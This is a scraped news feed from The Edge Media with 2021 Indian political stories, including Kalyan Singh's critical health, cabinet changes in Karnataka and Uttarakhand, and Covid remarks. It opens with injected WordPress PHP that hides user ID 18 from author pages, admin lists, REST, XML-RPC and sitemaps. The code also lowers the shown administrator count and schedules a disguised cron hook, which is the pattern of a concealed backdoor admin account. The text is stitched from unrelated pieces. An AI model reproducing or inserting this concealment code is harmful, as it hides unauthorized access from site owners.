add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Former UP CM Kalyan Singh health critical, on life saving support system appeared first on The Edge Media.
]]>Adityanath came to the Sanjay Gandhi Post Graduate Institute of Medical Sciences in the morning. He was accompanied by medical education minister Suresh Khanna, the hospital said in a statement.
“Kalyan Singh’s health status is critical and is on life-saving support system,” the hospital said, adding he is under close observation of the doctors.
“The senior faculty of Critical Care Medicine, Cardiology, Nephrology, Neurology and Endocrinology are keeping a close watch on all the aspects related to his health,” the hospital said.
Hospital director professor RK Dhiman is supervising his treatment on a daily basis, it added.
The former UP CM was admitted to the hospital’s intensive care unit on July 4 due to an infection and reduced consciousness level.
Earlier, he was undergoing treatment at the Dr Ram Manohar Lohia Institute of Medical Sciences here. The 89-year-old veteran leader had served as the governor of Rajasthan as well.
On August 1, Union home minister Amit Shah had visited the ailing leader at the hospital.
(With agency inputs)
The post Former UP CM Kalyan Singh health critical, on life saving support system appeared first on The Edge Media.
]]>The post Sustainable development possible only in a pollution-free system : Gujarat CM. appeared first on The Edge Media.
]]>“Along with development, Gujarat is concerned about its environment. The government is also so concerned about water. Sustainable development is only possible when a pollution-free system exists,” Rupani said while addressing the event.
Rupani said under the forest department’s social forestry programme — aimed at increasing tree-cover outside forest areas — the state government has targeted to have 50 crore trees. “In the past, there were only 25 crore trees (in 2003), that were part of forest department’s social forestry programme. Now we have increased it to 35 crore trees. There is a 15 per cent growth,” he claimed.
The post Sustainable development possible only in a pollution-free system : Gujarat CM. appeared first on The Edge Media.
]]>The post Prashant Kishore Resigns as Principal Advisor to Punjab chief Minister. appeared first on The Edge Media.
]]>In a letter to Amarinder Singh, Prashant Kishor said he was taking “a temporary break from active role in public life” and added he has yet to decide on his next move.
“As you are aware, in view of my decision to take a temporary break from my active role in public life, I have not been able to take over the responsibilities as your Principal Advisor. Since I am yet to decide on my future course of action, I write to request you to kindly relieve me from this responsibility,” Mr Kishor said in the letter.
He confirmed to NDTV that he “will not be involved in the next round of elections”, signaling that his focus is on the 2024 general election.
The post Prashant Kishore Resigns as Principal Advisor to Punjab chief Minister. appeared first on The Edge Media.
]]>The post 29 ministers sworn in Karnataka CM Basavaraj Bommai’s cabinet. appeared first on The Edge Media.
]]>The keenly-awaited cabinet expansion comes a week after Bommai took charge as the chief minister of the state, following the resignation of Yediyurappa.
Bommai had earlier said he will not have any deputy chief ministers in his cabinet as per the directions of the high command. Yediyurappa’s younger son and state BJP vice president B Y Vijayendra was not included in the cabinet.
State governor Thaawar Chand Gehlot administered the oath of office to the new ministers at the Raj Bhavan in Bengaluru.
Bommai’s team is a mixture of senior and fresh faces.
The post 29 ministers sworn in Karnataka CM Basavaraj Bommai’s cabinet. appeared first on The Edge Media.
]]>The post Karnataka chief minister BS Yediyurappa announces resignation at a programme that marked the completion of his 2 years government. appeared first on The Edge Media.
]]>Yediyurappa was speaking at a programme that marked the celebration of two years of the BJP government in the state. “I have decided to resign,” a news agency quoted the Karnataka chief minister as saying. “I will meet the Governor after lunch.”
Karnataka was rife with rumours earlier regarding the resignation of four-time chief minister BS Yediyurappa, who held a strong support base from the Lingayat community. The 77-year-old has already been dropping enough hints that he was on his way out, though the politicians whose names are being speculated to take his stead have dismissed any such possibility and attributed such speculations to mere political rumours.
The post Karnataka chief minister BS Yediyurappa announces resignation at a programme that marked the completion of his 2 years government. appeared first on The Edge Media.
]]>The post “92 percent of those died were not vaccinated”, says Conrad Sangma appeared first on The Edge Media.
]]>He said that of the 749 Covid deaths in Meghalaya – the state with second highest mortality rate of 1.68 per cent in the region after Nagaland (1.97 per cent) – at least 691 people were not vaccinated.
The Chief Minister’s statement comes as vaccination hesitancy is affecting the state’s inoculation coverage.
The Ministry of Health and Family welfare had on Wednesday said Meghalaya has inoculated only 74 percent of its healthcare workers with the first dose and only 48 percent people in the category have received their second dose. The state has also performed poorly in terms of vaccinating its frontline workers, those above 45 and those above 18.
So far, nearly eight lakh people have been vaccinated in Meghalaya, including both the first and the second dose.
There have been instances of vaccine hesitancy in several parts of Meghalaya where people aren’t getting vaccinated fearing side effects. Several attempts of the government to spread awareness among people had no major effect so far.
Chief Minister Sangma lamented that there are some elected representatives who have been openly criticizing the vaccination drive.
The post “92 percent of those died were not vaccinated”, says Conrad Sangma appeared first on The Edge Media.
]]>The post Pushkar Singh Dhami takes oath as CM of Uttarakhand appeared first on The Edge Media.
]]>BJP MLAs Satpal Maharaj, Harak Singh Rawat, Bansidhar Bhagat and Yashpal Arya also took oath as ministers in the new Uttarakhand cabinet.
Bishan Singh Chuphal, Subodh Uniyal, Arvind Pandey, Ganesh Joshi, Dhan Singh Rawat, Rekha Arya and Swami Yatishwaranand also took oath as ministers.
They were all part of the previous cabinet as well.
Dhami, 45, was picked for the top post during the BJP’s legislature meeting on Saturday.
According to reports, several senior BJP leaders in the Uttarakhand unit were unhappy over Dhami’s elevation.
The BJP went into a damage control mode and spent most of the morning pacifying the senior leaders.
The post Pushkar Singh Dhami takes oath as CM of Uttarakhand appeared first on The Edge Media.
]]>The post Pushkar Singh Dhami is the new CM of Uttarakhand appeared first on The Edge Media.
]]>The oath-taking ceremony of Pushkar Singh Dhami is likely to take place today, sources said.
His appointment to the top post comes after former chief minister Tirath Singh Rawat handed over his resignation letter to Governor Baby Rani Maurya on Friday.
Pushkar Singh Dhami, 45, will be the third chief minister of Uttarakhand in four months. His predecessor, Tirath Singh Rawat, took oath as Uttarakhand’s chief minister on March 10 this year, replacing Trivendra Singh Rawat.
Assembly elections are due in Uttarakhand next year.
Earlier, in a letter to BJP national president JP Nadda, Tirath Singh Rawat had said he was offering to resign in order to “avoid a constitutional crisis” in the state.
The post Pushkar Singh Dhami is the new CM of Uttarakhand appeared first on The Edge Media.
]]>The post Delhi likely to get Sputnik V in June says CM Kejriwal appeared first on The Edge Media.
]]>The post Delhi likely to get Sputnik V in June says CM Kejriwal appeared first on The Edge Media.
]]>The post Lawyers letter to CM Arvind Kejriwal appeared first on The Edge Media.
]]>Lawyers Request Delhi CM To Reserve Covid-19 Beds). He says that he is facing trouble in finding beds in the hospital
Many lawyers, judges, court staff and their family corona have been infected. There is also no government hospital around Dwarka sub-city and the population here is more than 12 lakhs.
Bar Association president YP Singh suggested that the recently built Indira Gandhi Government Hospital has 17 thousand beds. It should be opened to the public and beds should be reserved for the court staff.
YP Singh further said that at least 500 beds should be reserved for lawyers. Apart from this, 50 beds should be reserved for the judges and their families and 100 beds for the court staff.
Let us know that apart from the CM of Delhi, Union Health Minister Harsh Vardhan has also been sent.
It is further written in the letter that the CM of Delhi should consider the Bar Association’s demand to reserve beds as the situation in Corona’s Second Wave is becoming increasingly worse. In Delhi alone, more than 20 thousand cases of corona are coming up every day.
Significantly, the Kejriwal government had last week converted 100 rooms of Delhi’s Ashoka Hotel into a covid Health facility and reserved all these rooms for the judges, judicial officers and their families of Delhi High Court.
The Delhi High Court reprimanded the Kejriwal government on this. The High Court had said that they had never made any such demand from the Delhi government.
The post Lawyers letter to CM Arvind Kejriwal appeared first on The Edge Media.
]]>